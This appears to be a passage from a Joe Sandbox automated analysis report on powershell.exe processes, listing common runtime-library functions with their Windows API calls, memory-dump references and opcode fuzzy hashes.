                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 72036449-0
                                                                                                                                                                                                                                                        • Opcode ID: 70de817b94eb56562cf111e5a228638838f9470ea3f8b01316fe5af80cfbf40b
                                                                                                                                                                                                                                                        • Instruction ID: 16c3b46b69a1be2473fba5d53a08e820b266d33f3d51ebcb4b79f0a3ca8ee9a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70de817b94eb56562cf111e5a228638838f9470ea3f8b01316fe5af80cfbf40b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C5104B6D0C2429EF3655A38D101BBA7691EF08724F194434DA8DC72D6CE7CEB60D689
                                                                                                                                                                                                                                                        Function 00007FFB08158D34 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4141327611-0
                                                                                                                                                                                                                                                        • Opcode ID: 8b35b36f45371910769cae140345cab198ee4f2c816ae7eca87f942c0779e382
                                                                                                                                                                                                                                                        • Instruction ID: 65994430bd379e39e7efa9c6005a695e4685c13d8a9fb54911346c29a9f8989b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b35b36f45371910769cae140345cab198ee4f2c816ae7eca87f942c0779e382
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 714185B1A09682C6F7659B35D040B7B62E0EF98B90F144135DA9D47AD9DF3CDA41C708
                                                                                                                                                                                                                                                        Function 00007FFB0815CD90 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFB081571C7), ref: 00007FFB0815CDA9
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFB081571C7), ref: 00007FFB0815CE0B
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFB081571C7), ref: 00007FFB0815CE45
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFB081571C7), ref: 00007FFB0815CE6F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                                                                                                                        • Opcode ID: 8043d6a10b80adac71d47331782aa35487db9eab3aa7976c3d51698da3210ad1
                                                                                                                                                                                                                                                        • Instruction ID: 91de8ce04644cc907be5dc746223b36281d0c0a32bce9b96f4be8a5bbc56bd54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8043d6a10b80adac71d47331782aa35487db9eab3aa7976c3d51698da3210ad1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06214471A19791C5E6209F22E4408296AA4FF9CFD0F484134DE9E63BD9DF3CD652C784
                                                                                                                                                                                                                                                        Function 00007FFB08159668 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,Z:\syscalls\amsi_trace64.amsi.csv,00007FFB08158B59,?,?,?,?,00007FFB08156845,?,?,?,?,?,00007FFB08151137), ref: 00007FFB08159677
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,Z:\syscalls\amsi_trace64.amsi.csv,00007FFB08158B59,?,?,?,?,00007FFB08156845,?,?,?,?,?,00007FFB08151137), ref: 00007FFB081596E1
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,Z:\syscalls\amsi_trace64.amsi.csv,00007FFB08158B59,?,?,?,?,00007FFB08156845,?,?,?,?,?,00007FFB08151137), ref: 00007FFB081596EB
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                        • String ID: Z:\syscalls\amsi_trace64.amsi.csv
                                                                                                                                                                                                                                                        • API String ID: 1452528299-670373418
                                                                                                                                                                                                                                                        • Opcode ID: 270a20a0761032742f8aada57efd7dfebfe0e85ab3e500ac8a61d0d720b2729f
                                                                                                                                                                                                                                                        • Instruction ID: cdb265a103c8646c18c08d717ee35a9453fc0ef1189f11779e6fedb300733865
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 270a20a0761032742f8aada57efd7dfebfe0e85ab3e500ac8a61d0d720b2729f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72118BA0B0C742C2FA596731F5559392692AF4CBD0F044838E95E177C6EE2CEA44C309
                                                                                                                                                                                                                                                        Function 00007FFB081595D4 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFB08153AC0,?,?,UTF-8,00007FFB0816126A,?,?,?,?,?,?,?,?), ref: 00007FFB081595DE
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFB08153AC0,?,?,UTF-8,00007FFB0816126A,?,?,?,?,?,?,?,?), ref: 00007FFB08159646
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFB08153AC0,?,?,UTF-8,00007FFB0816126A,?,?,?,?,?,?,?,?), ref: 00007FFB0815965C
                                                                                                                                                                                                                                                        • abort.LIBCMT ref: 00007FFB08159662
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1447195878-0
                                                                                                                                                                                                                                                        • Opcode ID: 0de824fb4456a3f54efce4667c38384b2f4b44da0627287438e5e4ecb68c935d
                                                                                                                                                                                                                                                        • Instruction ID: 7b81c395ee9ada42ac58c57c508137015534d8b7467779c66575e2a0fd252ddb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0de824fb4456a3f54efce4667c38384b2f4b44da0627287438e5e4ecb68c935d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08015AE0B0D742C6FA596730F556D7D22929F4C790F144838D91F027D2EE2CEB45C20A
                                                                                                                                                                                                                                                        Function 00007FFB08159838 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                                        • Opcode ID: 8258148d1905072c8a4c2faab7b74b51d8ceb58b5a9e151900aafcee4d83c5bb
                                                                                                                                                                                                                                                        • Instruction ID: 700dd916085977fd203d1e304df438627a47fb1ef602081751b6d1d611af3140
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8258148d1905072c8a4c2faab7b74b51d8ceb58b5a9e151900aafcee4d83c5bb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B9107A2B09386C6EB218F35E180BAD6F95EF697D0F049131CA9D07395DE3DE611C316
                                                                                                                                                                                                                                                        Function 00007FFB08159C68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                        • Opcode ID: e74f5adce4b0228a81c8020ad78e7c12de1e9ce00c95b81b315395a7c8728e70
                                                                                                                                                                                                                                                        • Instruction ID: 666439594348d02f6d7aba8e9264924c9edb34c21dc07dce1fb415e05190d2fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e74f5adce4b0228a81c8020ad78e7c12de1e9ce00c95b81b315395a7c8728e70
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F55137A2B187C1C6E7248B39E941B696F91EF45B90F089231C69C87BDADE2CD140C705
                                                                                                                                                                                                                                                        Function 00007FFB0815702C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FFB08157065
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        • API String ID: 3307058713-4261414303
                                                                                                                                                                                                                                                        • Opcode ID: e64e86ba50d5c8c2f7d373246c070495d7231f94228b2a5e11f7f967b7f94424
                                                                                                                                                                                                                                                        • Instruction ID: 92b54c8aa99b7b1f4d35c05c89cbec98ab05f2b55b938c4b75c86c19d9e0243b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e64e86ba50d5c8c2f7d373246c070495d7231f94228b2a5e11f7f967b7f94424
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45418DB2A08A12C9E7149F35E8418B977A4EF48BD4B544835EA0E47B85DF3DE641C344

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC646605 Relevance: .4, Instructions: 433COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1514009058.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac640000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0e47fbeff0a4373b0d0ae545011f896fd698d92579bd1421db12ec3750b62bcc
                                                                                                                                                                                                                                                        • Instruction ID: 7efabda83c2566b570e82122060d59e31f69f0413b4f5979391fc9bf4edeeade
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e47fbeff0a4373b0d0ae545011f896fd698d92579bd1421db12ec3750b62bcc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DD116A290EB898FF756DB68DA155B57FA1EF46310B0451BEE04DC70D3EE18E8098392
                                                                                                                                                                                                                                                        Function 00007FFAAC579885 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1513401546.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac570000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2c9c06f6b054856afe9d5f802b7bcb3e5a34a2c30670eb2bcd5bddf9dc66cd00
                                                                                                                                                                                                                                                        • Instruction ID: cb75db9c29cba91ad4e5567fe4aa685526efdf87393ed7d90ec8dd32396b21d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c9c06f6b054856afe9d5f802b7bcb3e5a34a2c30670eb2bcd5bddf9dc66cd00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C351B831A1CB498FDB1CDF5CA8466B8BBE0FB99721F00422FE04993651CB75A456CBC2
                                                                                                                                                                                                                                                        Function 00007FFAAC644073 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1514009058.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac640000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 51faf2533eedccced0b4a9ed55cf029bd47d8b8b0e4e27bbf4ea89f77eaf1530
                                                                                                                                                                                                                                                        • Instruction ID: f78e0d05a50a7494e311b3192ddb3b7f075fcc9f40ba6a3c03d8ef3c13c3c080
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51faf2533eedccced0b4a9ed55cf029bd47d8b8b0e4e27bbf4ea89f77eaf1530
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E511822A0DA86CFF79AC71CCA525747BD1EF96310B19A1BAC14FC7593EE14E81983C1
                                                                                                                                                                                                                                                        Function 00007FFAAC579760 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1513401546.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac570000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 36332817c7b3e2393dc0f7e2f2b0cc25575375e8ec9c7472794497fe3841180b
                                                                                                                                                                                                                                                        • Instruction ID: 84479d1de11add7653f14ab78fb5a369030017b1e2527859bb645665a322bb17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36332817c7b3e2393dc0f7e2f2b0cc25575375e8ec9c7472794497fe3841180b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F641F87191DB898FE7199F5C9C065B97FE0FB96310F04426FE089C3292CA64A855CBD2
                                                                                                                                                                                                                                                        Function 00007FFAAC45EF00 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1512785136.00007FFAAC45D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC45D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac45d000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 071f0d66ed62ce4d3aadeb1522a0b45ff4c5016e7deae5a6c13b4932623a7501
                                                                                                                                                                                                                                                        • Instruction ID: f4902965a001129589441b01129b04782fe47a1b3fc5581b6e8c82ccf02a755b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 071f0d66ed62ce4d3aadeb1522a0b45ff4c5016e7deae5a6c13b4932623a7501
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D410B7140DBC45FE7568B2998556523FF0EF57324B1901DFD088CB1A3DA29EC49C792
                                                                                                                                                                                                                                                        Function 00007FFAAC57A49C Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1513401546.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac570000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 949b1da51a7abdeebe90a959f21946c16e46c8b4fad25dc71e8e8c6d237aeb8b
                                                                                                                                                                                                                                                        • Instruction ID: 5f14717d9915bfa5a2690294d7906120008ef471007a1170de0c59f36f311916
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 949b1da51a7abdeebe90a959f21946c16e46c8b4fad25dc71e8e8c6d237aeb8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C31483190CB488FEB19DB6CA84A6E97BE0EB96331F00816FD049C3152DA75A45ACB91
                                                                                                                                                                                                                                                        Function 00007FFAAC57A0FB Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1513401546.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac570000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ef94c61d0824aecd1f8f0364e1d4caaa009ce516993fda47b0fc988b6084ab7d
                                                                                                                                                                                                                                                        • Instruction ID: 063b4324655abecbc1dcf8b84a5febef3ed0d0e6201c865a888e80a48de9e908
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef94c61d0824aecd1f8f0364e1d4caaa009ce516993fda47b0fc988b6084ab7d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C2126AB98EA97CFF7458B18985D0F43F90FFA221170488B7E14C97052DD14D88D86D1
                                                                                                                                                                                                                                                        Function 00007FFAAC5733B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1513401546.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac570000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                        • Instruction ID: bee303c1f4efc301387659d61f640e7d41f0dbd1056ec0066b2a57676e6cd883
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9001677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45
                                                                                                                                                                                                                                                        Function 00007FFAAC644400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1514009058.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac640000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4dc5fa1ab29e435922d892b6c6e5063211b2af9a3363efabb703eb990b753fd8
                                                                                                                                                                                                                                                        • Instruction ID: 4799cca465112ad6a1d25e723354da86a4cbbe2e66347eca48b867672999f13a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dc5fa1ab29e435922d892b6c6e5063211b2af9a3363efabb703eb990b753fd8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF05E32A0D5448FE755EB5CE4429A877E0EF46320B5550B6E15EC7863DE25EC44C790
